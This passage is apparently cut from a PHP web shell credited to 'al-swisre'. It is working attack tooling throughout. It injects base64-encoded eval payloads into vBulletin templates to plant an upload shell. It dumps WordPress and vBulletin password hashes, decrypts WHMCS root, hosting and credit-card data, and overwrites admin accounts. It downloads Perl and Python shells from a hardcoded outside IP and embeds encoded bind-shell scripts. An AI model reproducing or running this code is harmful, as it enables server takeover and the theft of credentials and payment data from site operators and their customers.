1dCBuYW1lPSJ0YXIiIHR5cGU9InRleHQiIHN0eWxlPSJib3JkZXI6MXB4IGRvdHRlZCAjMDAzMzAwOyB3aWR0aDogMjEycHg7IGJhY2tncm91bmQtY29sb3I6IzBDMEMwQzsgZm9udC1mYW1pbHk6VGFob21hOyBmb250LXNpemU6OHB0OyBjb2xvcjojRkZGRkZGOyAiICAvPjxiciAvPg0KJm5ic3A7PC9wPg0KPHA+DQo8aW5wdXQgbmFtZT0iU3VibWl0MSIgdHlwZT0ic3VibWl0IiB2YWx1ZT0iR2V0IENvbmZpZyIgc3R5bGU9ImJvcmRlcjoxcHggZG90dGVkICMwMDMzMDA7IHdpZHRoOiA5OTsgZm9udC1mYW1pbHk6VGFob21hOyBmb250LXNpemU6MTBwdDsgY29sb3I6I0ZGRkZGRjsgdGV4dC10cmFuc2Zvcm06dXBwZXJjYXNlOyBoZWlnaHQ6MjM7IGJhY2tncm91bmQtY29sb3I6IzBDMEMwQyIgLz48L3A+DQo8L2Zvcm0+PGJyIC8+PGJyIC8+UmlnaHRzIG9mIHRoaXMgcGVybCB0byBLYXJhciBhTFNoYU1pJzsNCn1lbHNlew0KQGxpbmVzID08JEZPUk17cGFzc30+Ow0KJHkgPSBAbGluZXM7DQpvcGVuIChNWUZJTEUsICI+dGFyLnRtcCIpOw0KcHJpbnQgTVlGSUxFICJ0YXIgLWN6ZiAiLiRGT1JNe3Rhcn0uIi50YXIgIjsNCmZvciAoJGthPTA7JGthPCR5OyRrYSsrKXsNCndoaWxlKEBsaW5lc1ska2FdICA9fiBtLyguKj8pOng6L2cpew0KJmxpbCgkMSk7DQpwcmludCBNWUZJTEUgJDEuIi50eHQgIjsNCmZvcigka2Q9MTska2Q8MTg7JGtkKyspew0KcHJpbnQgTVlGSUxFICQxLiRrZC4iLnR4dCAiOw0KfQ0KfQ0KIH0NCnByaW50Jzxib2R5IGNsYXNzPSJuZXdTdHlsZTEiIGJnY29sb3I9IiMwMDAwMDAiPg0KPHA+RG9uZSAhITwvcD4NCjxwPiZuYnNwOzwvcD4nOw0KaWYoJEZPUk17dGFyfSBuZSAiIil7DQpvcGVuKElORk8sICJ0YXIudG1wIik7DQpAbGluZXMgPTxJTkZPPiA7DQpjbG9zZShJTkZPKTsNCnN5c3RlbShAbGluZXMpOw0KcHJpbnQnPHA+PGEgaHJlZj0iJy4kRk9STXt0YXJ9LicudGFyIj48Zm9udCBjb2xvcj0iIzAwRkYwMCI+DQo8c3BhbiBzdHlsZT0idGV4dC1kZWNvcmF0aW9uOiBub25lIj5DbGljayBIZXJlIFRvIERvd25sb2FkIFRhciBGaWxlPC9zcGFuPjwvZm9udD48L2E+PC9wPic7DQp9DQp9DQogcHJpbnQiDQo8L2JvZHk+DQo8L2h0bWw+Ijs=";\r\n $write = fwrite ($f2 ,base64_decode($sml_perl));\r\n if ($write) { @chmod(\'sa2/perl.pl\',0755);\r\n } echo "Symlink Perl";\r\n } break;\r\n } } } else { echo \'\r\nThe file path to symlink\r\n\r\n

\r\n\r\n

\r\n

\r\n

\r\n\r\n\r\n\r\n\r\n\';\r\n $pfile = $_POST[\'file\'];\r\n $symfile = $_POST[\'symfile\'];\r\n $symlink = $_POST[\'symlink\'];\r\n if ($symlink) { @symlink("$pfile","sym/$symfile");\r\n echo \'
\'.$symfile.\'\';\r\n exit;\r\n }else {exit;\r\n} } break;\r\n case \'ms\': $host = $_POST[\'host\'];\r\n $user = $_POST[\'user\'];\r\n $pass = $_POST[\'pass\'];\r\n $db = $_POST[\'db\'];\r\n if ($_GET[\'show\'] == \'tb\'){ $host_c = $_COOKIE[\'host_mysql\'];\r\n $user_c = $_COOKIE[\'user_mysql\'];\r\n $pass_c = $_COOKIE[\'pass_mysql\'];\r\n $db_c = $_COOKIE[\'db_mysql\'];\r\n $con = @mysql_connect($host_c,$user_c,$pass_c);\r\n $sel = @mysql_select_db($db_c);\r\n if(!$sel){ echo "mysql connect error" ;\r\n exit;\r\n} $dbname = $db_c;\r\n $pTable = mysql_list_tables( $dbname ) ;\r\n $num = mysql_num_rows( $pTable );\r\n echo "
\r\n
DomainsUserssymlink
\r\n
".$site."
\r\n		\r\n".$user[\'name\']."\r\n\r\nsymlink \r\n
";\r\n for( $i = 0;\r\n $i < $num;\r\n $i++ ) { $tablename = mysql_tablename( $pTable, $i );\r\n $sq3l=mysql_query("select * from $tablename");\r\n $c3t=mysql_num_rows($sq3l);\r\n echo "\r\n\r\n \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n ";\r\n if ($tablename == \'template\') { $secript = \'vb\';\r\n } else if ($tablename == \'wp_post\') {$secript = \'wp\';\r\n} else if ($tablename == \'jos_users\') {$secript = \'jm\';\r\n} else if ($tablename == \'tbladmins\') {$secript = \'wh\';\r\n} } if ($secript == \'vb\') { echo \'
\r\n
Options vBulletin \r\n

\r\n[ Update Index ]\r\n\r\n[ Inject shell]\r\n\r\n[ Show members Information]\r\n\';\r\n } else if ($secript == \'wp\') { echo \'\r\n
\r\n
Options Wordpress
\r\n

\r\n[ Change admin ]\r\n\r\n[ Show members]\';\r\n } else if ($secript == \'wh\'){ echo \'\r\n
\r\n
Options Whmcs
\r\n

\r\n[ roots]\r\n[ Clients Hosting Account ]\r\n[ Cards]

\r\n[ tickets]\r\n[ ticket replies]\r\n [ Search ticket]\r\n[ Change admin ]\';\r\n } else{echo \'
\';\r\n} echo "

\r\n\r\n [ baukup ]\r\n [ Inject css ]\r\n

\r\n
\r\n

\r\n\r\n\r\n

\r\n[ Logout ]";\r\n if (isset($_POST[\'cmd\'])) { $sql = $_POST[\'sql\'];\r\n $query =@mysql_query($sql,$con) or die;\r\n if ($query){echo "


CMD sql successfully
";\r\n} elseif(!$query) {echo "


CMD sql error
";\r\n} } exit;\r\n } else if ($_GET[\'show\'] == \'cl\') { $host_c = $_COOKIE[\'host_mysql\'];\r\n $user_c = $_COOKIE[\'user_mysql\'];\r\n $pass_c = $_COOKIE[\'pass_mysql\'];\r\n $db_c = $_COOKIE[\'db_mysql\'];\r\n $con = @mysql_connect($host_c,$user_c,$pass_c);\r\n $sel = @mysql_select_db($db_c);\r\n $tb = $_GET[\'tb\'];\r\n $col_sws = mysql_query("SHOW COLUMNS FROM $tb");\r\n $num2 = mysql_num_rows( $col_sws );\r\n echo "
Tables Rows
\r\n
".$tablename."
\r\n		\r\n".$c3t."\r\n
";\r\n for( $i2 = 0;\r\n $i2 < $num2;\r\n $i2++ ){ $col = mysql_fetch_row($col_sws) ;\r\n $um_sws = $col[0];\r\n echo "" ;\r\n $tit = mysql_query ("SELECT * FROM $tb" );\r\n while ($row = mysql_fetch_assoc($tit)) { $cont = $row[$um_sws] ;\r\n echo "" ;\r\n } ;\r\n } exit;\r\n } if (isset($_COOKIE[\'host_mysql\'])){ if (!isset($_GET[\'op\'])){ echo " ";\r\n exit;\r\n } } else if (!isset($_COOKIE[\'host_mysql\'])) { if (!isset($host)) { echo \'\r\n\r\n
\r\n\r\n


\r\n
\r\nhost :
\r\nuser :
\r\npass :
\r\ndb :
\r\n\r\n
\';\r\n exit;\r\n} else { $host = $_POST[\'host\'];\r\n $user = $_POST[\'user\'];\r\n $pass = $_POST[\'pass\'];\r\n $db = $_POST[\'db\'];\r\n $con = @mysql_connect($host,$user,$pass) ;\r\n $sel = @mysql_select_db($db,$con);\r\n if (!$sel) { echo " MYSQL INFOTMATI NOT TREY ";\r\n } else { setcookie( "host_mysql", $host);\r\n setcookie( "user_mysql", $user);\r\n setcookie( "pass_mysql", $pass);\r\n setcookie( "db_mysql", $db);\r\n ob_end_flush();\r\n echo " ";\r\n exit;\r\n }}} if (isset($_GET[\'op\'])) { $op = $_GET[\'op\'];\r\n $host_c = $_COOKIE[\'host_mysql\'];\r\n $user_c = $_COOKIE[\'user_mysql\'];\r\n $pass_c = $_COOKIE[\'pass_mysql\'];\r\n $db_c = $_COOKIE[\'db_mysql\'];\r\n $con3 =@mysql_connect($host_c,$user_c,$pass_c) or die ;\r\n $sedb3 =@mysql_select_db($db_c,$con3) or die;\r\n if (!$sedb3){echo "error in mysql connect ";\r\n exit;\r\n} if ($op == \'in\') { if (!isset($index)){ echo \'\r\n Your index :

\r\n
\r\n\r\n \r\n\r\n

\r\n \r\n \';\r\n } else if ($_POST[\'sql\']) { $index =$_POST[\'index\'];\r\n $index=str_replace("\\\'","\'",$index);\r\n $crypt = "{\\${eval(base64_decode(\\\'";\r\n $crypt .= base64_encode("echo \\"$index\\";\r\n");\r\n $crypt .= "\\\'))}}{\\${exit()}}";\r\n $sqlindex = "UPDATE `template` SET `template` = \'$crypt\'" or die;\r\n $query =@ mysql_query($sqlindex);\r\n if ($query) { echo "

Updated Index successfully
";\r\n echo "[ Back ]";\r\n exit;\r\n } else if (!$query) { echo "

Updated Index erorr
";\r\n echo "[ Back ]";\r\n exit;\r\n } } } else if($op == \'sh\') { if (!isset($_POST[\'ch\'])) { echo \'\r\n


\r\n
\r\n\r\n


\r\n\r\n\r\n\r\n\r\n\r\n\';\r\n } if (isset($_POST[\'sql\'])){ $ch = $_POST[\'ch\'];\r\n $shell = "DQoNCmVjaG8gJzxiPlsgYWwtc3dpc3JlIF0mbmJzcDsmbmJzcDtbIFNhdWRpIHNoZWxsIF08YnI+PGJyPjxicj48L2I+JzsgZWNobyAnPGZvcm0gYWN0aW9uPSIiIG1ldGhvZD0icG9zdCIgZW5jdHlwZT0ibXVsdGlwYXJ0L2Zvcm0tZGF0YSIgbmFtZT0idXBsb2FkZXIiIGlkPSJ1cGxvYWRlciI+JzsgZWNobyAnPGlucHV0IHR5cGU9ImZpbGUiIG5hbWU9ImZpbGUiIHNpemU9IjUwIj48aW5wdXQgbmFtZT0iX3VwbCIgdHlwZT0ic3VibWl0IiBpZD0iX3VwbCIgdmFsdWU9IlVwbG9hZCI+PC9mb3JtPic7IGlmKCAkX1BPU1RbJ191cGwnXSA9PSAiVXBsb2FkIiApIHsgaWYoQGNvcHkoJF9GSUxFU1snZmlsZSddWyd0bXBfbmFtZSddLCAkX0ZJTEVTWydmaWxlJ11bJ25hbWUnXSkpIHsgZWNobyAnPGI+VXBsb2FkIFN1Y2Nlc3MgISEhPC9iPjxicj48YnI+JzsgfSBlbHNlIHsgZWNobyAnPGI+VXBsb2FkIEZhaWwgISEhPC9iPjxicj48YnI+JzsgfSB9IA0KPz4=" ;\r\n $crypt = "{\\${eval(base64_decode(\\\'";\r\n $crypt .= "$shell";\r\n $crypt .= "\\\'))}}{\\${exit()}}";\r\n if ($ch == \'faq\'){$sqlfaq="UPDATE template SET template =\'".$crypt."\' WHERE title =\'FAQ\'";\r\n} elseif ($ch == \'cal\'){$sqlfaq="UPDATE template SET template =\'".$crypt."\' WHERE title =\'CALENDAR\'";\r\n} elseif ($ch == \'sea\'){$sqlfaq="UPDATE template SET template =\'".$crypt."\' WHERE title =\'search_forums\'";\r\n} $query =@ mysql_query($sqlfaq);\r\n if ($query) { echo "


Injection has been successfully
";\r\n echo "[ Back ]";\r\n exit;\r\n } else if (!$query) { echo "


Injection has been erorr !
";\r\n echo "[ Back ]";\r\n exit;\r\n } } } else if ($op == \'shm\') { $sql = \'select * from `user`\';\r\n $query =@ mysql_query($sql);\r\n if ($query) { while ($row = mysql_fetch_assoc($query)) { echo "\r\n

Columns NameContent
$um_sws \r\n$cont
\r\n\r\n \r\n \r\n \r\n \r\n \r\n\r\n\r\n\r\n\r\n \r\n \r\n \r\n \r\n \r\n\r\n\r\n
ID :user :pass :salt :email :
".$row[\'userid\']."".$row[\'username\']."".$row[\'password\']."".$row[\'salt\']."".$row[\'email\']."
\r\n\r\n ";\r\n }} } else if ($op == \'out\') { setcookie( "host_mysql", $host,time()-3600);\r\n setcookie( "user_mysql", $user,time()-3600);\r\n setcookie( "pass_mysql", $pass,time()-3600);\r\n setcookie( "db_mysql", $db,time()-3600);\r\n ob_end_flush();\r\n echo " ";\r\n exit;\r\n } else if ($op == \'hroot\') { if (isset($_POST[\'viw\'])) { $hash = $_POST[\'hash\'] ;\r\n $query = mysql_query("SELECT * FROM tblservers");\r\n echo "
\r\n hosting roots\r\n ";\r\n while($row = mysql_fetch_array($query)) { echo "\r\n \r\n\r\n ";\r\n } echo "
TypenocActiveIP AddressusernamePassword
{$row[\'type\']}{$row[\'noc\']}{$row[\'active\']}{$row[\'ipaddress\']}{$row[\'username\']}".decrypt($row[\'password\'], $hash)."
";\r\n $query = mysql_query("SELECT * FROM tblhosting where username = \'root\' or \'admin\' or \'administrator\'");\r\n echo "\r\n

\r\n Clients roots\r\n ";\r\n while($row = mysql_fetch_array($query)) { echo "\r\n \r\n\r\n ";\r\n } echo "
IP AddressusernamePassword
{$row[\'dedicatedip\']}{$row[\'username\']}".decrypt($row[\'password\'], $hash)."
";\r\n echo "
[ Back ]";\r\n exit;\r\n } else { echo\'
\r\n

\r\nencryption hash



\r\n\r\n\r\n
\';\r\n exit;\r\n } } else if ($op == \'scard\') { if (isset($_POST[\'viw\'])) { $hash = $_POST[\'hash\'] ;\r\n $query = mysql_query(\'select * from `tblclients`\') ;\r\n echo "
";\r\n while($v = mysql_fetch_array($query)) { echo "\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n ";\r\n echo "\r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
cardtypeidfirstnamelastnameemailcityciuntryaddress1lastloginphonenumberdatecreatedcardnumstartdateexpdate
{$v[\'cardtype\']}{$v[\'id\']}{$v[\'firstname\']}{$v[\'lastname\']}{$v[\'email\']}{$v[\'city\']}{$v[\'ciuntry\']}{$v[\'address1\']}{$v[\'lastlogin\']}{$v[\'phonenumber\']}{$v[\'datecreated\']}".decrypt ($v[\'cardnum\'], $hash)."".decrypt ($v[\'startdate\'], $hash)."".decrypt ($v[\'expdate\'], $hash)."
";\r\n echo "
[ Back ]";\r\n exit;\r\n } }else { echo\'
\r\n

\r\nencryption hash



\r\n\r\n\r\n
\';\r\n exit;\r\n } } else if ($op == \'chost\') { if (isset($_POST[\'viw\'])) { $hash = $_POST[\'hash\'] ;\r\n $query = mysql_query("SELECT * FROM tblhosting");\r\n echo "
\r\n ";\r\n while($r = mysql_fetch_array($query)) { echo "\r\n ";\r\n } echo "
domainUsernamePassIP Address
{$r[\'domain\']}{$r[\'username\']}".decrypt ($r[\'password\'], $hash)."{$r[\'dedicatedip\']}
";\r\n echo "
[ Back ]";\r\n exit;\r\n } else { echo\'
\r\n

\r\nencryption hash



\r\n\r\n\r\n
\';\r\n exit;\r\n } } else if ($op == \'cadmin\') { if (isset($_POST[\'viw\'])) { $pass = md5($_POST[\'pass\']);\r\n $user = $_POST[\'user\'];\r\n $query =@mysql_query("UPDATE `tbladmins` SET `username` =\'".$user."\' WHERE ID = 1");\r\n $query =@mysql_query("UPDATE `tbladmins` SET `password` =\'".$pass."\' WHERE ID = 1");\r\n if ($query) { echo "

Updated admin successfully
";\r\n echo "
[ Back ]";\r\n exit;\r\n } else if (!$query) { echo "

Updated admin erorr
";\r\n echo "
[ Back ]";\r\n exit;\r\n } } else { echo\'
\r\n

\r\nuser :

\r\npass :

\r\n\r\n\r\n
\';\r\n exit;\r\n } } else if ($op == \'trak\') { $page = $_GET[\'page\'];\r\n $numpr = 30;\r\n if(!$page){$page = 0;\r\n} $sql0 = mysql_query("Select * from tbltickets");\r\n $num_r0s = mysql_num_rows($sql0);\r\n $sql = mysql_query("Select * from tbltickets order by id desc limit $page,$numpr");\r\n $ap = 1;\r\n echo "

Page : ";\r\n for ($s = 0 ;\r\n $s < $num_r0s;\r\n $s = $s+$numpr ) { if ($page != $s) { echo "$ap";\r\n} else {echo "$ap";\r\n} $ap ++;\r\n } echo "

";\r\n while ($r3o = mysql_fetch_assoc($sql)) { $email = $r3o[\'email\'];\r\n $date = $r3o[\'date\'];\r\n $title = $r3o[\'title\'];\r\n $message = $r3o[\'message\'];\r\n echo "
";\r\n echo "\r\n

";\r\n echo "
email : $email date : $date title : $title
message $message
";\r\n echo "
[ Back ]";\r\n exit;\r\n } } else if ($op == \'rtrak\') { $page = $_GET[\'page\'];\r\n $numpr = 25;\r\n if(!$page){$page = 0;\r\n} $sql0 = mysql_query("Select * from tblticketreplies");\r\n $num_r0s = mysql_num_rows($sql0);\r\n $sql = mysql_query("Select * from tblticketreplies order by id desc limit $page,$numpr");\r\n $ap = 1;\r\n echo "

Page : ";\r\n for ($s = 0 ;\r\n $s < $num_r0s;\r\n $s = $s+$numpr ) { if ($page != $s) { echo "$ap";\r\n} else {echo "$ap";\r\n} $ap ++;\r\n } echo "

";\r\n while ($r3o = mysql_fetch_assoc($sql)) { $email = $r3o[\'email\'];\r\n $date = $r3o[\'date\'];\r\n $message = $r3o[\'message\'];\r\n echo "
";\r\n echo "\r\n

";\r\n echo "
email : $email date : $date
message $message
";\r\n echo "
[ Back ]";\r\n exit;\r\n } } else if ($op == \'bkup\') { if (isset($_POST[\'viw\'])) { $path = $_POST[\'path\'];\r\n $domp = @backup_tables($path,$host_c,$user_c,$pass_c,$db_c);\r\n echo "

Create backup successfully

$path
";\r\n echo "
[ Back ]";\r\n exit;\r\n } else { echo\'
\r\n

\r\npath backup



\r\n\r\n\r\n
\';\r\n exit;\r\n } } else if ($op == \'sh3\') { if (isset($_POST[\'viw\'])) { $string = $_POST[\'string\'];\r\n $ch = $_POST[\'ch\'];\r\n if ($ch == \'trs\') { $sql4 = @mysql_query("Select * from tblticketreplies WHERE `message` LIKE \'%$string%\'");\r\n } else if($ch == \'tr\') { $sql4 = @mysql_query("Select * from tbltickets WHERE `message` LIKE \'%$string%\' ");\r\n } $nu0 = @mysql_num_rows($sql4);\r\n if ($nu0 == 0){echo "No result";\r\n exit;\r\n} while ($r33o = mysql_fetch_assoc($sql4)) { $date = $r33o[\'date\'];\r\n $title = $r33o[\'title\'];\r\n $message = $r33o[\'message\'];\r\n echo "
";\r\n echo "\r\n

";\r\n echo "
email : $email date : $date title : $title
message $message
";\r\n exit;\r\n } } else { echo\'
\r\n

\r\nsearch :  \r\n \r\n

\r\n\r\n\r\n
\';\r\n exit;\r\n } } else if ($op == \'sh3\') { if (isset($_POST[\'viw\'])) { $string = $_POST[\'string\'];\r\n $ch = $_POST[\'ch\'];\r\n if ($ch == \'trs\') { $sql4 = @mysql_query("Select * from tblticketreplies WHERE `message` LIKE \'%$string%\'");\r\n } else if($ch == \'tr\') { $sql4 = @mysql_query("Select * from tbltickets WHERE `message` LIKE \'%$string%\' ");\r\n } $nu0 = @mysql_num_rows($sql4);\r\n if ($nu0 == 0){echo "No result";\r\n exit;\r\n} while ($r33o = @mysql_fetch_assoc($sql4)) { $date = $r33o[\'date\'];\r\n $title = $r33o[\'title\'];\r\n $message = $r33o[\'message\'];\r\n echo "
";\r\n echo "\r\n

";\r\n echo "
email : $email date : $date title : $title
message $message
";\r\n } } else { echo\'
\r\n

\r\nsearch :  \r\n \r\n

\r\n\r\n\r\n
\';\r\n exit;\r\n } } else if ($op == \'css\') { if (isset($_POST[\'viw\'])) { $index = $_POST[\'index\'];\r\n $seh = $_POST[\'string\'];\r\n $rs = search($seh);\r\n if(count($rs) == 0){echo \'No result\';\r\nexit;\r\n} foreach ($rs as $info) { $table = $info[\'table\'];\r\n $column = $info[\'column\'];\r\n echo "table : $table

\r\n\r\n column : $column\r\n
\r\n

\r\n\r\n \r\n \r\n \r\n \r\n
\r\n";\r\n exit;\r\n } } else { echo\'
\r\n

\r\nsearch : \r\n
\r\nCss url :

\r\n\r\n\r\n
\';\r\n exit;\r\n } if (isset($_POST[\'v\'])) { $seh = $_POST[\'shearc\'] ;\r\n $table = $_POST[\'table\'];\r\n $column = $_POST[\'column\'] ;\r\n $rlcss = $_POST[\'index\'] ;\r\n $data = "";\r\n $query = mysql_query("UPDATE ".$table." SET ".$column." =\'$data\' WHERE `$column` LIKE \'%$seh%\'") or die(mysql_error());\r\n if($query){ echo "

Injection has been successfully
";\r\n echo "
[ Back ]";\r\n exit;\r\n }else{ echo \'

Injection erorr
\';\r\n exit;\r\n } } } else if ($op == \'awp\') { if (isset($_POST[\'viw\'])) { $pass = $_POST[\'pass\'];\r\n $user = $_POST[\'user\'];\r\n $crypt = crypt($pass);\r\n $query =@mysql_query("UPDATE `wp_users` SET `user_login` =\'".$user."\' WHERE ID = 1") or die;\r\n $query =@mysql_query("UPDATE `wp_users` SET `user_pass` =\'".$crypt."\' WHERE ID = 1") or die;\r\n if ($query) { echo "

Updated admin successfully
";\r\n echo "
[ Back ]";\r\n exit;\r\n } else if (!$query) { echo "

Updated admin erorr
";\r\n echo "
[ Back ]";\r\n exit;\r\n } } else { echo\'
\r\n

\r\nuser :

\r\npass :

\r\n\r\n\r\n
\';\r\n } } else if ($op == \'shwp\') { $sql = \'select * from `wp_users`\';\r\n $query =@ mysql_query($sql);\r\n if ($query) { while ($row = mysql_fetch_assoc($query)) { echo "\r\n

\r\n\r\n \r\n \r\n \r\n \r\n\r\n\r\n\r\n\r\n\r\n \r\n \r\n \r\n \r\n\r\n\r\n\r\n\r\n
ID :user :pass :email :
".$row[\'ID\']."".$row[\'user_login\']."".$row[\'user_pass\']."".$row[\'user_email\']."
\r\n\r\n\r\n ";\r\n echo "
[ Back ]";\r\n exit;\r\n }} } } break;\r\n case \'info\': $sws = \'al-swisre\' ;\r\n if ($sws != \'al-swisre\'){echo "Coded by al-swisre";\r\n exit;\r\n} if(strlen($dir)>1 && $dir[1]==":") $os = "Windows";\r\n else $os = "Linux";\r\n $read = @file_get_contents("http://s92443018.onlinehome.us/cgi-bin/host.php?$ips");\r\n $r3ad = @file_get_contents("http://aruljohn.com/track.pl?host=$ips") ;\r\n $ipnet = @findit($read,"
IP-Network \r\n","IP-Network-Block \r\n","","
\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n";\r\n exit;\r\n break;\r\n case \'byp\': echo \'
\r\n[ bypass ]\r\n\r\n[Make Shell Perl]\r\n\r\n[ Make Shell Python ]\r\n[ Get file ]\r\n\r\n


\' ;\r\n $op = $_GET[\'op\'];\r\n if(@$_GET[\'dir\']){ $dir = $_GET[\'dir\'];\r\n if($dir != \'nullz\') $dir = @cleandir($dir);\r\n } if ($op == \'shell\') { $sh = $_GET[\'sh\'];\r\n if (!isset($_POST[\'get\'])) { echo "\r\nPath shell :

\r\nname shell :

\r\nhtaccess :

\r\n

\r\n";\r\n }else { $path = $_POST[\'path\'];\r\n $name = $_POST[\'name\'];\r\n $htac = $_POST[\'htx\'];\r\n if (isset($htac)) { $fop = @fopen("$path/.htaccess", \'w\');\r\n @fwrite($fop,$htac);\r\n @fclose($fop);\r\n } $rpath = $path."/".$name;\r\n if ($sh == \'perl\') { $url_shell = \'http://64.15.137.117/~google/cgi-bin/perl.zip\';\r\n $path = $dir."/".$d3r."/"."sa.pl";\r\n } else if($sh == \'py\') { $url_shell = \'http://64.15.137.117/~google/cgi-bin/python.zip\';\r\n $path = $dir."/".$d3r."/"."sa.py";\r\n } $fp = @fopen($rpath, \'w\');\r\n $ch = @curl_init($url_shell);\r\n @curl_setopt($ch, CURLOPT_FILE, $fp);\r\n $data = @curl_exec($ch);\r\n @curl_close($ch);\r\n @fclose($fp);\r\n if (!is_file($rpath)) { $ch = @curl_init($url_shell);\r\n @curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);\r\n $data = @curl_exec($ch);\r\n @curl_close($ch);\r\n @file_put_contents($rpath, $data);\r\n }elseif (@is_file($rpath)) { $ch =@chmod($rpath,0755);\r\n echo "Sh3ll have been created

\r\n$rpath";\r\n }else {echo "error";\r\n} } } elseif ($op == \'g3t\') { if (!isset($_POST[\'get\'])) { echo \'Get file


\r\n\r\nUrl file :  \r\n \r\n\r\nto :

\r\n\r\n\r\n\' ;\r\nexit;\r\n } else { $url_shell = $_POST[\'file\'];\r\n $path = $_POST[\'path\'];\r\n $fp = @fopen($path, \'w\');\r\n $ch = @curl_init($url_shell);\r\n @curl_setopt($ch, CURLOPT_FILE, $fp);\r\n $data = @curl_exec($ch);\r\n @curl_close($ch);\r\n @fclose($fp);\r\n if (!is_file($path)) { $ch = @curl_init($url_shell);\r\n @curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);\r\n $data = @curl_exec($ch);\r\n @curl_close($ch);\r\n @file_put_contents($path, $data);\r\n }elseif (@is_file($path)) { echo "got the file successfully

\r\n$path";\r\n exit;\r\n }else {echo "error";\r\n} } }else if(!isset($op)) {} break;\r\n case \'con\': if (!isset($_POST[\'con\'])) { echo "";\r\n echo "\r\n
Information Server
Hostname".$hostname."
ISP".$isp."
IP-Network".$ipnet."
IP-Network-Block".$ipb."
Safe Mode".(($safe_mode)?("  \r\n: ON"):("OFF"))."
System".$os."
PHP Version ".phpversion()."
Zend Version ".@zend_version()."
Magic_Quotes ". magicQouts()."
Curl ".Curl()."
Register Globals ".RegisterGlobals()."
Open Basedir ".openBaseDir()."
Gzip ".Gzip()."
Free Space ".HardSize(disk_free_space(\'/\'))."
Total Space ".HardSize(disk_total_space("/"))."
MySQL".MySQL2()."
MsSQL".MsSQL()."
PostgreSQL".PostgreSQL()."
Oracle".Oracle()."
\r\n
\r\n\r\n\r\n\r\n\r\n\r\n";\r\n exit;\r\n }else { if ($_POST[\'con\'] == \'Connect\') { $ip = $_POST[\'ip\'] ;\r\n $port = $_POST[\'port\'] ;\r\n $op = $_POST[\'op\'] ;\r\n $bind_perl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";\r\n $bind_py = "IyBTZXJ2ZXIgIA0KIA0KaW1wb3J0IHN5cyAgDQppbXBvcnQgc29ja2V0ICANCmltcG9ydCBvcyAgDQoNCmhvc3QgPSAnJzsgIA0KU0laRSA9IDUxMjsgIA0KDQp0cnkgOiAgDQogICAgIHBvcnQgPSBzeXMuYXJndlsxXTsgIA0KDQpleGNlcHQgOiAgDQogICAgIHBvcnQgPSAzMTMzNzsgIA0KIA0KdHJ5IDogIA0KICAgICBzb2NrZmQgPSBzb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVUICwgc29ja2V0LlNPQ0tfU1RSRUFNKTsgIA0KDQpleGNlcHQgc29ja2V0LmVycm9yICwgZSA6ICANCg0KICAgICBwcmludCAiRXJyb3IgaW4gY3JlYXRpbmcgc29ja2V0IDogIixlIDsgIA0KICAgICBzeXMuZXhpdCgxKTsgICANCg0Kc29ja2ZkLnNldHNvY2tvcHQoc29ja2V0LlNPTF9TT0NLRVQgLCBzb2NrZXQuU09fUkVVU0VBRERSICwgMSk7ICANCg0KdHJ5IDogIA0KICAgICBzb2NrZmQuYmluZCgoaG9zdCxwb3J0KSk7ICANCg0KZXhjZXB0IHNvY2tldC5lcnJvciAsIGUgOiAgICAgICAgDQogICAgIHByaW50ICJFcnJvciBpbiBCaW5kaW5nIDogIixlOyANCiAgICAgc3lzLmV4aXQoMSk7ICANCiANCnByaW50KCJcblxuPT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09Iik7IA0KcHJpbnQoIi0tLS0tLS0tIFNlcnZlciBMaXN0ZW5pbmcgb24gUG9ydCAlZCAtLS0tLS0tLS0tLS0tLSIgJSBwb3J0KTsgIA0KcHJpbnQoIj09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PVxuXG4iKTsgDQogDQp0cnkgOiAgDQogICAgIHdoaWxlIDEgOiAjIGxpc3RlbiBmb3IgY29ubmVjdGlvbnMgIA0KICAgICAgICAgc29ja2ZkLmxpc3RlbigxKTsgIA0KICAgICAgICAgY2xpZW50c29jayAsIGNsaWVudGFkZHIgPSBzb2NrZmQuYWNjZXB0KCk7ICANCiAgICAgICAgIHByaW50KCJcblxuR290IENvbm5lY3Rpb24gZnJvbSAiICsgc3RyKGNsaWVudGFkZHIpKTsgIA0KICAgICAgICAgd2hpbGUgMSA6ICANCiAgICAgICAgICAgICB0cnkgOiAgDQogICAgICAgICAgICAgICAgIGNtZCA9IGNsaWVudHNvY2sucmVjdihTSVpFKTsgIA0KICAgICAgICAgICAgIGV4Y2VwdCA6ICANCiAgICAgICAgI